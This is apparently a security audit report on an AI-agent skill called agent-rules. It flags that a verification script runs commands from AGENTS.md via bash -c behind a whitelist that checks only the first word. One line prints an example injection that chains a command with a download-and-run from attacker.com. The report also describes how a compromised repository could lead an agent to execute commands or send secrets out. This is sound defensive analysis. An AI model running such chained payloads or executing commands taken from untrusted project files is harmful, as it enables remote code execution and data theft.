agent-rules

Warn

Audited by Gen Agent Trust Hub on Jun 18, 2026

Risk Level: MEDIUMCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONDATA_EXFILTRATION
Full Analysis
  • [COMMAND_EXECUTION]: The script scripts/verify-commands.sh is designed to verify that documented commands in AGENTS.md are valid by executing them via bash -c. This creates a direct execution path for any string found in the project's documentation sections.
  • [REMOTE_CODE_EXECUTION]: The is_safe_command validation function in scripts/verify-commands.sh uses a whitelist approach that only inspects the first word of a command. It permits powerful tools such as curl, wget, docker, and various language runtimes. Because it does not sanitize the rest of the command string, an attacker can use shell metacharacters like ;, |, or && to bypass the whitelist and execute arbitrary code (e.g., ls; curl http://attacker.com/payload | bash).
  • [DATA_EXFILTRATION]: The inclusion of curl and wget in the verification whitelist allows the agent to unknowingly send sensitive project information or environment variables to external servers if a malicious command is embedded in the project's configuration files.
  • [COMMAND_EXECUTION]: The skill's primary workflow involves running several Bash scripts that interact with the local filesystem and execute build tools (e.g., go, npm, composer) based on the contents of untrusted project files, which is a significant attack surface if the repository being audited is compromised.
Audit Metadata
Risk Level
MEDIUM
Analyzed
Jun 18, 2026, 05:44 AM
Security Audit — agent-trust-hub — agent-rules